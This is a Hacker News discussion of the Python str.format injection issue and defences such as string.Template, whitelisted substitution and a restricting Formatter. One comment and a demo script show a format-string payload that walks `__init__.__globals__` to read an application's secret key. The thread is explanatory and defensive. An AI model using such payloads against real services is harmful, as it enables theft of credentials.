I think asking how to sanitize it is really asking the wrong question. We shouldn't sanitize a format string from a user in the first place. We should get input and generate a format string rather than allow one to be supplied "raw".

For example, using re.sub as another commenter pointed out.
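A rough sketch of what the re.sub approach might look like, assuming placeholders of the form `{name}` and a flat dict of allowed values. The `render_title` name and the field names are hypothetical, not taken from the other commenter's code.

```python
import re

# Matches {name} where name is a plain word; "{a.b}" or "{a[0]}" never match.
PLACEHOLDER = re.compile(r"\{(\w+)\}")

def render_title(template, values):
    """Substitute only whitelisted names; leave everything else untouched."""
    def replace(match):
        name = match.group(1)
        if name in values:
            return str(values[name])
        return match.group(0)  # unknown name: keep the literal text
    return PLACEHOLDER.sub(replace, template)

fields = {"title": "Hello", "blog": "My Blog"}
print(render_title("{title} - {blog}", fields))
print(render_title("{title.__class__}", fields))
```

Because the substitution code only ever does a dict lookup, there is nothing to sanitize: attribute and index syntax is simply not part of the mini-language.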

An even more Pythonic solution would be to use the built-in string.Template [1] which at a glance appears to be safe against this kind of attack (but I haven't tested in code).

I'm not sure why Armin didn't mention string.Template in his post other than that it is much more restricted than str.format, however that kind of seems like the point to me.

[1]: https://docs.python.org/3.4/library/string.html#template-str...
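For what it's worth, a quick check with `string.Template` under its default identifier pattern, which only accepts plain names. The `Post` class and its fields are invented for the test.

```python
from string import Template

class Post:
    def __init__(self):
        self.title = "Hello"
        self.secret = "do not leak"

post = Post()

# Plain names are substituted as expected.
ok = Template("$title - $blog").substitute(title=post.title, blog="My Blog")

# Dotted access inside braces is not a valid placeholder.
try:
    Template("${post.secret}").substitute(post=post)
    rejected = False
except ValueError:
    rejected = True

# safe_substitute leaves the invalid placeholder in place instead of raising.
untouched = Template("${post.secret}").safe_substitute(post=post)

print(ok, rejected, untouched)
```

Note that an unbraced `$post.secret` would substitute `$post` (the object's string form) followed by the literal text `.secret`, so it is still better to pass in only the values you mean to expose.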

daveguy · on Jan 1, 2017

Since 2.4:

https://docs.python.org/2/library/string.html#template-strin...

angusp · on Jan 1, 2017

It's a well-known C pattern that you should never trust a user-supplied format string, e.g. printf(arg) vs printf("%s", arg). The same applies here.

Cyph0n · on Dec 31, 2016

Scala's solution to string formatting is the best out there imo. You can put basically any code into the format placeholder.

http://docs.scala-lang.org/overviews/core/string-interpolati...

UnoriginalGuy · on Dec 31, 2016

I don't really understand what you mean. They're pointing out unintended consequences of allowing arbitrary string formats. You're linking to one you call "better" which would allow even more powerful misuse of arbitrary string formats.

And while Scala's string formatting looks cool, it hardly seems like your reply applies to the topic/thread. In fact ironically it seems to point out that this would be an even bigger issue in Scala.

merb · on Dec 31, 2016

> be an even bigger issue in Scala.

not with string interpolation in scala. it only works on compile time so it's not possible to actually take user input strings (without runtime reflection of course)

> it hardly seems like your reply applies to the topic/thread

yes string interpolation (scala) has less to do with it. it can't be compared to the python one.

icebraining · on Dec 31, 2016

Python's string interpolation only works on compile time as well¹, this isn't interpolation, it's a runtime method in the string class, which Scala also has, in fact, with the same name (.format).

¹ (compilation in CPython generally occurs during initialization of the execution, though you can pre-compile files manually)

merb · on Dec 31, 2016

thanks for correcting me. actually my statement that it has nothing to do with `.format` is not wrong; I was just mistaken about the python code. I thought it meant the new stuff (i.e. interpolation), but I actually skipped the first code snippet.

kazinator · on Dec 31, 2016

What the Python code is doing is arguably a form of run-time reflection. Format strings contain embedded variables and expressions, and the format function evaluates them: hence reflection.

Format strings occurring as literals in Python source could be treated at compile time, like in Scala.

babyrainbow · on Jan 1, 2017

Discussion of this PEP from when it was accepted, with people handwaving and downvoting arguments against it.

https://www.reddit.com/r/Python/comments/3k6qi8/pep_498_appr...

tedunangst · on Jan 1, 2017

And again, not the feature under discussion.

babyrainbow · on Jan 5, 2017

Not sure what you mean...

FeepingCreature · on Jan 1, 2017

If you are making a new language, the easy way to fix this is make formatting a property of your strings, not a runtime function. Ie. instead of having "foo {bar}".format(bar=bar), have "foo {bar}" be equivalent to "foo "+bar.

This sidesteps the problem because only literal strings are formatted.
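Python 3.6's f-strings behave roughly this way. A small sketch, assuming Python 3.6 or later; the variable names are arbitrary.

```python
bar = "world"

# A literal: the interpolation is compiled as part of the source code.
greeting = f"foo {bar}"

# A runtime value that merely looks like a format string stays inert,
# because nothing ever interprets the braces inside it.
user_supplied = "foo {bar.__class__}"
echoed = f"{user_supplied}"

print(greeting)
print(echoed)
```

The second string only becomes dangerous if the program explicitly calls `.format()` on it, which is the runtime function this thread is about.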

libeclipse · on Dec 31, 2016

I tend to use the old style ("%s" % "lel"). Just wondering, does this affect that too?

antsar · on Dec 31, 2016

Attribute access doesn't seem to work with old-style formatting, so I would think it's safe.

    >>> class foo:
    ...     def __init__(self, **kwargs):
    ...             self.__dict__.update(kwargs)
    ...
    >>> my_foo = foo(secret="bazinga")
    >>>
    >>> "%(foo)s" % {'foo': my_foo}
    '<__main__.foo instance at 0x1101d23f8>'
    >>>
    >>> "%(foo.secret)s" % {'foo': my_foo}
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    KeyError: 'foo.secret'
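For contrast, a sketch of the same object going through both styles as a script. It reuses the class from the session above (renamed `Foo`); the result variable names are made up.

```python
class Foo:
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)

my_foo = Foo(secret="bazinga")

# New-style formatting follows the dot and reads the attribute.
new_style = "{foo.secret}".format(foo=my_foo)

# Old-style formatting treats "foo.secret" as one dictionary key.
old_style_error = None
try:
    "%(foo.secret)s" % {"foo": my_foo}
except KeyError as exc:
    old_style_error = exc

print(new_style)
print(repr(old_style_error))
```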

bubblesocks · on Dec 31, 2016

The nice thing about the new format is that you can reverse the order of the variables inside the string, which is nice when you're localizing strings into languages with reversed sentence structures, like Japanese. I haven't done a ton of Python, but the old style won't let you do that, will it?

Franciscouzo · on Dec 31, 2016

Reversing the order is not possible, but you can use a dict instead:

    >>> "%(foo)s" % {"foo": "bar"}
    'bar'
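To spell out how the dict form covers the localization case, here is a small sketch: the same values are fed to two templates that mention the names in different orders. The message strings are invented, not real translations.

```python
values = {"count": 3, "folder": "Inbox"}

# Two templates, as a translator might supply them, naming the same keys
# in different orders.
count_first = "%(count)d messages in %(folder)s"
folder_first = "%(folder)s: %(count)d messages"

print(count_first % values)
print(folder_first % values)
```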

dozzie · on Jan 1, 2017

Funny. I thought Python implemented all the quirks of the original printf() formatting, including using arguments at specific positions. Apparently it didn't (and arguably it's a good thing).

    $ printf '%2$s %2$s %1$s\n' aaa bbb
    bbb bbb aaa

libeclipse · on Dec 31, 2016

Heyyyyyy I did not know that. TIL, thank you.

nitely · on Dec 31, 2016

Yes, it will, just use named placeholders: "%(some)s" % {'some': 'helllo'}

tedmiston · on Jan 1, 2017

I'm not sure I understand the use case for reversing the formatting variables, but you could do this to make old-style formatting work that way:

    >>> 'hello, %s %s' % tuple(reversed(['smith', 'bob']))
    'hello, bob smith'

I think it's more readable if you abstract that bit into a lambda function:

    >>> rev_args = lambda *args: tuple(reversed(args))
    >>> 'hello, %s %s' % rev_args('smith', 'bob')
    'hello, bob smith'

Pxtl · on Jan 1, 2017

Odd they reference c# since c# does not have this feature in its traditional format strings - they don't allow you to access arbitrary members.

C# recently added string interpolation, which does allow arbitrary code, but string interpolation itself is compiled C# code and can't be stored like a format string.

Personally I use mustache when i need format-string-like-behavior from semi-trusted users.

foota · on Dec 31, 2016

Wow, I had no idea you could access attributes from within format strings.

iamsk · on Jan 10, 2017

This should be fixed built-in, like how SQL injection was fixed.

agumonkey · on Dec 31, 2016

Once again strings and io formatting making fun of us.

bbcbasic · on Jan 1, 2017

Pure functions ftw

atabdiwa · on Dec 31, 2016

... Uncontrolled format string bugs? In 2016? Really? Someone would fall for that? ..

the_mitsuhiko · on Dec 31, 2016

Old style format strings are perfectly safe for arbitrary user input and commonly used as such.

dom0 · on Jan 1, 2017

User-provided format strings seem rather rare to me ; at least in scenarios where the user doesn't have full access anyway (eg. controlling output formatting of some command).

dlbucci · on Dec 31, 2016

I do love writing python, but it's pretty shocking when I find out you can write something like `event.__init__.__globals__[CONFIG][SECRET_KEY]`. That language just does not care about privacy or information hiding at all, I guess.
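A minimal reproduction of that kind of expression, assuming it runs as a top-level script so that `CONFIG` is a module global. The `Event` class and the secret value are placeholders.

```python
# Stand-in for application configuration living at module level.
CONFIG = {"SECRET_KEY": "hunter2"}

class Event:
    def __init__(self, name):
        self.name = name

# A format string as an untrusted user might supply it.
user_format = "{event.__init__.__globals__[CONFIG][SECRET_KEY]}"

# str.format walks from the object to its method, to the globals of the
# module that defined it, and then indexes into the config dict.
leaked = user_format.format(event=Event("launch"))
print(leaked)
```

Nothing here is private API abuse on the caller's side; the only mistake is letting the user choose the string that `.format()` is called on.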

hakanderyal · on Dec 31, 2016

Python's general mentality can be summed as "We are all consenting adults here". If you want to access some part of program or data, you generally can, but the burden of not breaking anything while messing with internals is on you.

This is a great power, but also can become an unlimited source of bugs.

brianwawok · on Dec 31, 2016

You can do the same thing in Java with reflection.

Don't let users run untrusted code. Full stop.

If you need templating use a sandbox like jinja2.

Godel_unicode · on Dec 31, 2016

The discovered vulnerability manifested itself in jinja2.

Edit: release notes https://www.palletsprojects.com/blog/jinja-281-released/

brianwawok · on Dec 31, 2016

Exactly it's already fixed. It's in the article.

dom0 · on Jan 1, 2017

Format strings aren't a template language (Python even has Template Strings for that purpose), and being able to do this is quite useful, e.g. in debug logs it's shorter and easier to write "{foo.x} ({foo.__class__.__name__})".format(foo=something).

Conversely they don't prohibit expensive properties either (eg. ORM-based lookups), or generating misleading output or whatever.

jsjohnst · on Dec 31, 2016

I'd love to hear your perspectives on Ruby if this bothers you that much.

anamoulous · on Dec 31, 2016

What does Ruby have to do with any of this?

goatlover · on Dec 31, 2016

Like PHP and JS's template literals, it has full on string interpolation.

jsjohnst · on Jan 1, 2017

Guys, this has nothing to do with interpolation. I like both Python and Ruby's string interpolation. I'm replying to the incredulous parent of my post who's griping about magic methods (where admittedly Ruby likely takes the crown).

anamoulous · on Dec 31, 2016

Arguably Ruby is worse because you can execute instance methods in interpolation, but I still don't see why that's germane to this discussion other than to pick a fight about languages.

smitherfield · on Jan 1, 2017

Ruby string interpolation can only happen in literal source code, not in user input.

    2.4.0 :001 > a = 5
     => 5
    2.4.0 :002 > gets.chomp
    #{a}
     => "\#{a}"

Manishearth · on Dec 31, 2016

These are only in literals, however. You cannot have a string value with interpolation exprs inside it (both in JS and Ruby)

jsjohnst · on Jan 1, 2017

See the parent comment I'm replying to. Parent is ridiculing Python "magic methods". If he thinks they are bad, just wait till he sees Ruby.

ak217 · on Dec 31, 2016

Until now I thought the new features were confined to `f""` format strings.

Edit: As correctly pointed out, this feature has been around since the introduction of str.format(). So this warning applies to all Python versions.

tedunangst · on Dec 31, 2016

This is not a new feature.

DasIch · on Dec 31, 2016

This is not a new feature.

throwaway91111 · on Dec 31, 2016

This existed in python 2.6; it's not a new feature by any means.

stevebmark · on Dec 31, 2016

Doesn't this apply to any language that has string interpolation: Ruby, Python, Javascript, Perl, etc.? And doesn't it not really matter, because it's not realistic to use a dynamic string template in a program?

Manishearth · on Dec 31, 2016

Ruby format strings are like old-style Python format strings. They only map to names or positional arguments. Perl also just maps to positional arguments, like printf. The most you can do is mess up the string by moving around positional args.

JS format strings get evaluated at "compile time", as do Ruby interpolation literals. You cannot have a string with format specifiers in it, you can have a backtick-delimited string literal with format specifiers in it. The formatting is done when the interpreter encounters this literal; the user can't input such a value since these literals aren't a different kind of value.

> because it's not realistic

Done reasonably often for i18n. Not a good i18n solution, but for many it's good enough :|

_kdhr · on Jan 1, 2017

> So what do you do if you do need to let someone else provide format strings? You can use the somewhat undocumented internals to change the behavior.

Well, that's just sloppy and shame on you for exposing programming internals to a user in a service. What did you expect? Write your own format string parser and stop being lazy.
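One possible middle ground between a hand-written parser and the undocumented internals is a sketch built on the documented `string.Formatter` hooks. The `SafeFormatter` name is hypothetical, and this is not the approach from the article: it simply refuses any field that uses attribute or index syntax.

```python
from string import Formatter

class SafeFormatter(Formatter):
    """Allow only plain field names such as {title}; reject {a.b} and {a[0]}."""

    def get_field(self, field_name, args, kwargs):
        # get_field is called for every replacement field, including fields
        # nested inside a format spec.
        if "." in field_name or "[" in field_name:
            raise ValueError("attribute/index access not allowed: %r" % field_name)
        return super().get_field(field_name, args, kwargs)

fmt = SafeFormatter()
print(fmt.format("{title} - {blog}", title="Hello", blog="My Blog"))

try:
    fmt.format("{post.__init__}", post=object())
    blocked = False
except ValueError:
    blocked = True
print(blocked)
```

This keeps the familiar brace syntax and format specs (width, alignment and so on) while removing the part that walks object graphs.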